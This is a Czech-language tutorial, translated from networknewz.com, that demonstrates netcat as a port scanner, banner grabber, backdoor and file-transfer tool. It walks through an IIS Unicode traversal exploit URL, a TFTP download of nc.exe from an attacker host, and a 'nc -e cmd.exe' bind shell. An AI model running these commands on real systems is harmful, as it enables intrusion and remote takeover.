Hacking s NetCatem (překlad)

Verze pro tiskPDF verze

V tomto článku bych se chtěl zmínit o možnostech využití programu NetCat. Pro někoho je to denní rutina, ale protože jsem viděl i lidi, kteří NetCat neuměli ani spustit, natoź s ním něco kloudného udělat, tak jsem sepsal tento jednoduchý článek. Je zde obsaženo, jak používat NetCat jako scanner portů, backdoor, telnet nebo také použití NetCatu k přenášení souborů.

Tento článek je českým překladem článku NetCat Security z networknewz.com. Odkaz na originální článek.

NetCat je utilita, která je schopná odesílat a přijímat data přes TCP a UDP spojení. NetCat může být použit jako port scanner, backdoor, port redirector, port listener a ještě na spoustu dalších cool věcí. Není to vždycky nejlepší nástroj pro práci, ale pokud bych se dostal ne opuštěný ostrov, tak bych si chtěl vzít NetCat s sebou. V tomhle návodu budu demonstrovat kompletní hack jenom s využitím NetCatu, abych ukázal, jak mnohostranný nástroj to je.

Scannování portů s NetCatem

Scannování si ukážeme hned na příkladu nc -v -w 2 -z target 20-30. NetCat se bude pokoušet připojit na každý port mezi 20 a 30. Přepínač -z předchází posílání dat do TCP spojení a limituje data na UDP spojení. Přepínač -i vkládá mezeru mezi každé vyzkoušení portu. Ačkoli může být NetCat použit pro scannování portů, tak to není jeho nejsilnější stránka. Nástroje jako Nmap jsou pro scann portů daleko lepší.


NetCat cmd img

Scannovali jsme 192.168.1.1, porty 1-200. Kromě ostatních můžeme vidět otevřené porty 80, 21 a 25...

Banner Grabbing s NetCatem

Tak teď chceme zjistit, co běží na portech 80 a 21. K získání banneru můžeme použít NetCat následujícím způsobem.


NetCat cmd img


NetCat cmd img

Tak teď víme, že se pravděpodobně jedná o systém Windows 2000, protože na něm běží server IIS 5.0 a Microsoft FTP Service.

Tak a teď pojďme poslat na server upravené URL, kterým se pokusíme exploitnout "File Traversal vulnerability" na nepatchovaným serveru. Na vyzkoušení budeme používat NetCat a když to půjde, tak NetCat na server uploadneme a ukážeme si, jak můžeme NetCat využít jako backdoor.

Pokud nevíte, co je to ten "Unicode File traversal exploit", můžete se podívat na web a hledat něco jako "IIS Unicode File Traversal". (Dneska už to asi nebude fungovat, ale na demonstraci NetCatu to musí stačit.)


NetCat cmd img

Super! Poslali jsme na server URL: http://192.168.1.90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c: k napadení IIS serveru a to co vidíme je adresář na disku serveru.

Výborně! Teď chceme na server uploadnout NetCat. Tak použijeme TFTP a integrujeme TFTP příkaz do upraveného URL.


NetCat cmd img

tftp -I 192.168.1.9 GET nc.exe

Se přetransformuje do:

http://.../c+TFTP+-i+192.168.1.9+GET+nc.exe

Pomocí prográmku TFTPD teda dáme NetCat ne server.


NetCat cmd img

NetCat jako backdoor

Tak a teď máme NetCat uploadnutý na serveru a chceme ho použít k vytvoření zadních vrátek (backdoor), aby jsme získali vzdálený příkazový řádek.
K použití NetCatu jako backdoor potřebujeme, aby naslouchal na nějakém vybraném portu (my se vybereme třeba port 10001), abychom se na něj mohli připojit z našeho počítače... samozřejmě použitím zase NetCatu :))

Příkaz, který pošleme na server vypadá nějak takhle :

nc -L -p 10001 -d -e cmd.exe

A tady k tomu máme vysvětlivky :

nc -> spustí NetCat
-L -> říká NetCatu, aby čekal na příchozí spojení
-p -> port, na kterém NetCat čeká
-d -> stealth mode
-e -> spustí nějaký program (cmd.exe) a čeká na příchozí spojení

Teď když budeme tenhle příkaz chtít přetransformovat zase na URL :

http://.../c+nc+-L+-p+10001+-d+-e+cmd.exe

No a teď uź zbývá jenom NetCat spustit naostro...


NetCat cmd img

Nyní bychom měli mít spuštěný NetCat naslouchající na portu 10001. Teďka se z naší mašiny připojíme na NetCat na serveru.


NetCat cmd img

Máme vzdálený příkazový řádek serveru a můžeme ho plně ovládat.

Přenos souborů pomocí NetCatu

Pojďme se podívat na ostatní možnosti, které NetCat poskytuje. Chceme přenést soubor hack.txt na server a z nějakého důvodu nemůžeme použít TFTP. Můžeme použít NetCat...

Na přijímání souboru hack.txt musí být NetCat na serveru nastaven takto :

nc -l -p 1234 >hack.txt


NetCat cmd img

Z našeho počítače odešleme soubor následovně :

nc destination 1234


NetCat cmd img

A takhle vypadá soubor hack.txt


NetCat cmd img

A…Voila!


NetCat cmd img

Vidíme, že soubor hack.txt byl úspěšně přenesen na server přes port 1234.